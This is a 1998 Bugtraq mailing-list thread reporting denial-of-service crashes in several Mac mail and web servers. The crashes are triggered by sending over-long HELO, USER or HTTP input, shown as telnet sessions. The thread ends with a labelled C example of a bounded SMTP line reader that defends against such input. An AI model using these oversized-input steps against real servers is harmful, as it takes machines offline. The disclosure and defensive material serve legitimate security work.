Date: Wed, 8 Apr 1998 13:11:17 +1200
From: Chris Wedgwood <chris@CYBERNET.CO.NZ>
To: BUGTRAQ@NETSPACE.ORG
Subject: AppleShare IP Mail Server

[Yet another buffer overrun? - I hope this isn't getting monotonous]

I noticed this a while back but haven't seen anyone else mention it.

There appears to be what looks like a buffer overrun problem with AppleShare IP Mail Server. If you connect to the SMTP port and issue a long string (say 500 bytes or so) the server crashes - and because it's a Mac, it usually crashes the whole machine to the point where it needs a reboot.

So far I've only tested against servers which emit the banner 'AppleShare IP Mail Server 5.0.3'

For example:

    $ telnet some.where
    Trying 1.2.3.4...
    Connected to some.where.
    Escape character is '^]'.
    220 some.where AppleShare IP Mail Server 5.0.3 SMTP Server Ready
    HELO XXXXXXXXXXX[....several hundred of these....]XXXXXXXX
    [ and it just hangs ]

    $ ping some.where
    [ ...nothing... ]

Physically checking the machine shows it has `locked up' and it needs a reboot.

I assume if you can cause a crash without the lockup then you might be able to execute code and do something useful (on a Mac?).

-cw

Date: Wed, 8 Apr 1998 12:34:09 +0800
From: David Luyer <luyer@UCS.UWA.EDU.AU>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: AppleShare IP Mail Server

Chris Wedgwood wrote:
> 220 some.where AppleShare IP Mail Server 5.0.3 SMTP Server Ready
> HELO XXXXXXXXXXX[....several hundred of these....]XXXXXXXX
> [ and it just hangs ]

Same with

    220-Stalker Internet Mail Server V.1.6 is ready.
    220 ESMTP is spoken here.
    HELO xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    [dead]

But then, isn't that expected of using toy machines (Macs/Win PCs) for servers?

David.

Date: Tue, 14 Apr 1998 10:01:05 -0400 (EDT)
From: Netstat Webmaster <feh@netstat.net>
Subject: MacOS based buffer overflows...

Eudora Internet Mail Server vs. 1.2, 2.0, 2.01 DoS

Telnet to port 106 of an EIMS server. Type USER xxxxxxxxxxxx (at least a 1000+ char string). EIMS will crash, occasionally taking the entire machine with it.

---

Apple's Web Sharing DoS

Telnet to port 80 of a Web Sharing server (built into system 8.0+). Upon connect enter any string of at least 3000+ characters. Hit return twice, Web Sharing will stop servicing. It does not seem to make the server any less stable and Web Sharing seems to be able to be restarted without a reboot and without any ill effects.

Phanty.

    printf("usage: %s <smtp server>\n", argv[0]); exit(1);
    printf("Unknown host: %s\n",argv[1]); exit(1);
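
The server-side check whose absence the reports in this thread point to, as an added example that is not code from any of the posters or from the products named: a bounded SMTP line reader in C that drops bytes past the RFC 821 limit of 512 characters per command line (CRLF included) and answers 500 instead of writing past its buffer. The names line_reader, smtp_feed and handle_command, and the 255-byte DOMAIN_MAX cap, are assumptions made for the illustration.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define SMTP_LINE_MAX 512  /* RFC 821 command-line limit, CRLF included */
#define DOMAIN_MAX    255  /* assumed cap on the HELO argument */

struct line_reader {
    char   buf[SMTP_LINE_MAX]; /* at most 510 bytes + CR, then the NUL */
    size_t len;                /* bytes stored for the current line */
    int    overflow;           /* current line already exceeded the limit */
};

/* Hypothetical command handler: only HELO is modelled here. */
static int handle_command(const char *line)
{
    if (strncasecmp(line, "HELO", 4) != 0) return 500;
    if (line[4] != ' ' || line[5] == '\0') return 501;
    return strlen(line + 5) <= DOMAIN_MAX ? 250 : 501;
}

/* Feed bytes as they arrive from the socket. Returns the SMTP reply code
 * for the last line completed in this chunk, or 0 if no line ended. */
int smtp_feed(struct line_reader *r, const char *data, size_t n)
{
    int reply = 0;
    for (size_t i = 0; i < n; i++) {
        if (data[i] != '\n') {
            if (r->len < SMTP_LINE_MAX - 1) r->buf[r->len++] = data[i];
            else r->overflow = 1;   /* drop the byte, never write past buf */
            continue;
        }
        if (r->len > 0 && r->buf[r->len - 1] == '\r') r->len--;
        r->buf[r->len] = '\0';
        reply = r->overflow ? 500 : handle_command(r->buf);
        r->len = 0; r->overflow = 0;   /* ready for the next command */
    }
    return reply;
}

int main(void)
{
    struct line_reader r = {0};
    const char *ok = "HELO mail.example\r\n";
    char big[600];                     /* constructed over-long HELO line */
    memset(big, 'X', sizeof big);
    memcpy(big, "HELO ", 5);
    printf("%d\n", smtp_feed(&r, big, sizeof big));  /* 0: no line end yet */
    printf("%d\n", smtp_feed(&r, "\r\n", 2));        /* 500: line too long */
    printf("%d\n", smtp_feed(&r, ok, strlen(ok)));   /* 250: session goes on */
    return 0;
}
```

The over-long line is rejected only once its terminating LF arrives, so the reader stays in step with the client and the next command is parsed normally.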